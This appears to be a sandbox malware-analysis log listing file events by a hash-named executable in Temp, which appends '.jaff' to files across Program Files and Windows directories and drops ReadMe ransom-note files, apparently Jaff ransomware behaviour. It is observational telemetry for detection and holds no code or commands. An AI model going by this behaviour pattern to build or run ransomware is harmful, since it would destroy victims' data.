Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PAPYRUS\THMBNAIL.PNG.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\TAB_OFF.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewFrame.html.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CONCRETE\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RESUME.XML.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115841.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\PREVIEW.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\PublicFunctions.js.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityLetter.Dotx.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15019_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR13F.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\en-US\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14655_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\SNEEZE.WAV.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\include\win32\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL075.XML.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\PrivateBrowsing_150.png.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR24F.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BREEZE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\db\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lij.txt.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\VisualElements\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\PREVIEW.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\COMPUTER.ICO.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03014_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\SUCTION.WAV.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21311_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21331_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winsxs\x86_microsoft-windows-wwfcorecomp.resources_31bf3856ad364e35_6.1.7600.16385_de-de_1248d52c93fe6e31\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_netfx-aspnet_webmintrust_config_b03f5f7f11d50a3a_6.1.7600.16385_none_b724a267c2ccea7a\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..fessional.resources_31bf3856ad364e35_6.1.7600.16385_en-us_83a96f16be1ecf82\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..t-starter.resources_31bf3856ad364e35_6.1.7601.17514_it-it_9aff0a0726ff98b6\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7600.16385_de-de_e73ca319a82aa327\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-b..isc-tools.resources_31bf3856ad364e35_6.1.7600.16385_en-us_e31d2d92828b5ec3\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-gadgets-cpu.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_efed75e2fbac9517\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7601.17514_it-it_068a8aa70d654920\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\NetFx40_IIS_schema_update.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7601.17514_en-us_91a2a3662d8ffd41\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1041\eula.rtf.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\diagnostics\index\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-g..-currency.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_5c4791cafd126e03\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..soundthemes-savanna_31bf3856ad364e35_6.1.7600.16385_none_8501e89d0b011992\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_netfx-aspnet_common_sql_b03f5f7f11d50a3a_6.1.7600.16385_none_9b5d3c5138868587\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_6.1.7601.17514_es-es_2db40b99b2736660\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..homebasic.resources_31bf3856ad364e35_6.1.7601.17514_it-it_cb41e15d1e0fe8c0\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..omebasicn.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_be5cbd3b6b3e4c5c\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v3.5\SQL\es\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..nterprise.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_289b855890d86e62\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-i..lprovider.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_25d4ec0b90e21a29\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7601.17514_it-it_dd8dde728f4e7060\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\Graphics\Rotate8.ico.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_netfx-weblowtrust_config_b03f5f7f11d50a3a_6.1.7600.16385_none_b282c116d6e6d47e\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Speech\Engines\SR\ja-JP\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ie-antiphishfilter_31bf3856ad364e35_11.2.9600.16428_none_dde9296580ccbddf\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..ultimatee.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_eee4e052cd1adbab\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..-soundthemes-garden_31bf3856ad364e35_6.1.7600.16385_none_f7a4bf1e15863e21\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_6.1.7601.17514_none_288b7acec3a75696\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-xwizards_31bf3856ad364e35_6.1.7600.16385_none_77fe6053a02b5dc7\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-fax-common.resources_31bf3856ad364e35_6.1.7600.16385_de-de_fcb2dd5d6182f5ae\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..omebasice.resources_31bf3856ad364e35_6.1.7600.16385_de-de_61da96604705f464\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_en-us_1aca4d46a08df107\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..ultimatee.resources_31bf3856ad364e35_6.1.7600.16385_es-es_bc7b845ad586d402\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..omebasice.resources_31bf3856ad364e35_6.1.7600.16385_it-it_c1ae04d6b2f5d213\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_de-de_71d9774db1afe542\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-lpksetup.resources_31bf3856ad364e35_6.1.7601.17514_de-de_559eb6a7b33ef039\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\legacy.web_minimaltrust.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\web.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\inf\PERFLIB\0409\perfh.dat.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..terprisee.resources_31bf3856ad364e35_6.1.7601.17514_de-de_8d33546de1c5ef03\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-powerdiagnostic_31bf3856ad364e35_6.1.7600.16385_none_9654ef966755d06f\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..l-wallpaper-starter_31bf3856ad364e35_6.1.7600.16385_none_f08164982f2fecda\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_netfx-machine_config_ocm_b03f5f7f11d50a3a_6.1.7601.17514_none_81fa0191bdd08961\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-e..eady_eula.resources_31bf3856ad364e35_6.1.7600.16385_es-es_959ec7b53a342ec3\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
